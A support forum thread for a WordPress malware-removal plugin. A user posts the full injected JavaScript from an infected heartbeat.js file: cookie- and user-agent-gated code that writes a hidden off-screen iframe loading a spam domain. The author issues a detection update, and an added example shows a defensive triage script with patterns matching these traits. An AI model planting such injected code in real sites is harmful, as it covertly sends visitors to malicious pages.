Plugin Author
Eli
(@scheeeli)
Can you please post the entire infected file so that I can test it? I need to see what it finds in the original file to see why it’s not removing the whole infection.
Thanks, Eli
Here is the full one (only the ‘spam’ URL is different: http://poper.addible.ml vs http://poper.addictedness.ga)
function getCookie(name){var matches=document.cookie.match(new RegExp("(?:^|; )"+name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+"=([^;]*)"));return matches?decodeURIComponent(matches[1]):undefined}(function(){function stripos(f_haystack,f_needle,f_offset){var haystack=(f_haystack+'').toLowerCase();var needle=(f_needle+'').toLowerCase();var index=0;if((index=haystack.indexOf(needle,f_offset))!==-1){return index}return false}function milenium_agent(){var falshSpis=['AppleWebKit','Windows NT 6.3','X11'];var falshUA=false;for(var i in falshSpis){if(stripos(navigator.userAgent,falshSpis[i])){falshUA=true;break}}return falshUA}var bb=(getCookie("delicatesma7fueja")===undefined);if(!milenium_agent()&&bb){document.write('<iframe style="position:absolute;margin-top: -1004px;" src="http://poper.addible.ml" width="160" height="137"></iframe>');var date=new Date(new Date().getTime()+48*60*60*1000);document.cookie="delicatesma7fueja=1; path=/; expires="+date.toUTCString()}})();
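The behaviours visible in the snippet posted above, written as a small triage check for JavaScript files. This is an added example, not part of the original thread and not the plugin's own detection logic; the function names, the verdict labels and the placeholder host in the sample are assumptions.

```javascript
// Added example: names below (normalizeQuotes, TRAITS, triage) are hypothetical,
// not part of the plugin discussed in this thread.

// Forum software rewrites ASCII quotes as typographic ones; undo that first.
function normalizeQuotes(src) {
  return src
    .replace(/[\u201C\u201D\u2033]/g, '"')
    .replace(/[\u2018\u2019\u2032]/g, "'");
}

// One predicate per behaviour visible in the posted sample.
const TRAITS = {
  // document.write() emitting an <iframe> element
  writesIframe: (s) => /document\.write\s*\(\s*['"]\s*<iframe\b/i.test(s),
  // iframe pushed off-screen with a large negative offset
  offscreenFrame: (s) =>
    /<iframe[^>]*style\s*=\s*["'][^"']*(?:margin-)?(?:top|left)\s*:\s*-\d{3,}px/i.test(s),
  // inject only when a marker cookie is absent, then set that same cookie
  cookieGate: (s) => {
    const m = /getCookie\(\s*["'](\w+)["']\s*\)\s*===\s*undefined/.exec(s);
    return !!m && new RegExp("document\\.cookie\\s*=\\s*[\"']" + m[1] + "=").test(s);
  },
  // behaviour switched on the visitor's user agent
  uaFilter: (s) => /navigator\.userAgent/.test(s),
};

function triage(source) {
  const s = normalizeQuotes(source);
  const hits = Object.keys(TRAITS).filter((name) => TRAITS[name](s));
  let verdict = "clean";
  if (hits.includes("writesIframe") && hits.includes("offscreenFrame")) verdict = "injected";
  else if (hits.length >= 2) verdict = "review";
  return { hits, verdict };
}

// Constructed inputs: a shortened copy of the posted snippet (placeholder host),
// still carrying the forum's typographic quotes, and an unrelated benign script.
const SAMPLE_INFECTED =
  "var bb=(getCookie(\u201Cdelicatesma7fueja\u201D)===undefined);" +
  "if(!milenium_agent()&&bb){document.write(\u2018<iframe style=\u201Dposition:absolute;" +
  "margin-top: -1004px;\u201D src=\u201Dhttp://placeholder.invalid\u201D></iframe>\u2019);" +
  "document.cookie=\u201Ddelicatesma7fueja=1; path=/\u201D}" +
  "function milenium_agent(){return /X11/.test(navigator.userAgent)}";
const SAMPLE_BENIGN = "var ua=navigator.userAgent;document.write('<p>ok</p>');";

console.log(triage(SAMPLE_INFECTED), triage(SAMPLE_BENIGN));
```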
Plugin Author
Eli
(@scheeeli)
There must be more code in that file. Is this the entire contents of the infected file or just the infected part of the file?
Can you please send me the whole file? You can send it as an attachment if that’s easier. My direct email is: eli AT gotmls DOT net
Aloha, Eli
I will send you my heartbeat.js file by mail
Plugin Author
Eli
(@scheeeli)
Thank you!
I have a new definition update available that includes this new variant. If you have any more of these scripts on your server you can download the new definition update and then use the automatic fix to remove all the malicious code. If you have any of these files that were only half fixed by the older definitions you should restore the original files from the quarantine and scan them again and then fix them with the new definition.
Please let me know how this works for you, and mark this topic as “resolved” if it is working.
Aloha, Eli
Everything fixed, thank you for the plugin and the swift replies
Paypalled you some drinking money 😉